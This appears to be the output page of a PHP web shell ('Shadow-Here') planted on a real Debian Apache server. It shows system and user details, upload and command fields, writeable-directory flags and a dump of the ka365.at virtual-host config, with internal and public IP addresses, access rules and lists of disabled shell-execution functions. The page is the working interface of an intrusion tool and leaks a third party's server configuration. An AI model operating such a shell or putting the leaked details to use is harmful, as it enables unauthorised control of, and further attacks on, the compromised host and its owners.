Shadow-Here


Server : Apache
System : Linux methusalix2 3.16.0-11-amd64 #1 SMP Debian 3.16.84-1 (2020-06-09) x86_64
User : hios ( 1437)
PHP Version : 5.6.40-0+deb8u12
Disable Function : proc_close,proc_open,dl,shell_exec,passthru
Directory :  /etc/apache2/sites-available/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :
Current File : //etc/apache2/sites-available/ka365.at
#Use VhostITK ka365 ka365.at /home/ka365 /home/ka365/public_html
Use VhostITKSSL 91.220.179.173 ka365 ka365.at /home/ka365 /home/ka365/public_html
Use VhostITKSSL 91.220.179.170 ka365 ka365.at /home/ka365 /home/ka365/public_html
<VirtualHost 10.92.0.10:80>

        ServerName ka365
        DocumentRoot /home/ka365/public_html
#       <IfModule mpm_itk_module>
                AssignUserId ka365 ka365
#       </IfModule>

        <Directory />
          AllowOverride All
          Options +FollowSymLinks
          #AllowOverride Options FileInfo Indexes Limit AuthConfig
          Deny from 77.88.24.0/24
        </Directory>
#       php_admin_value open_basedir "/var/tmp:/tmp:/usr/lib/php:/usr/share/php:/var/lib/php5:/usr/share/pear:/home/ka365:/home/staff/typo3"
        ServerAdmin webmaster@ka365.at
        php_admin_value disable_functions "proc_close,proc_open,dl,shell_exec,passthru"
## php_admin_value disable_functions "exec,system,proc_close,proc_open,dl,shell_exec,passthru"
### php_admin_value suhosin.executor.func.blacklist exec,system,proc_close,proc_open,dl,shell_exec,passthru
        php_admin_value suhosin.executor.func.blacklist proc_close,proc_open,dl,shell_exec,passthru
        php_admin_value suhosin.memory_limit  129M

# logging
        CustomLog  /home/ka365/logs/access.log combined
        ErrorLog   /home/ka365/logs/error.log

        <Location /stats>
                Deny from all
                # fa, 12.10.2015, 91.224.70.28 hinzugefügt, Anfrage Körbler, Marc Scheuer
                Allow from 85.233.116.114 91.220.179.15 91.224.70.28
        </Location>

        MaxClientsVHost         50

        IncludeOptional /etc/apache2/sites/ka365.at/*.conf

</VirtualHost>

Samx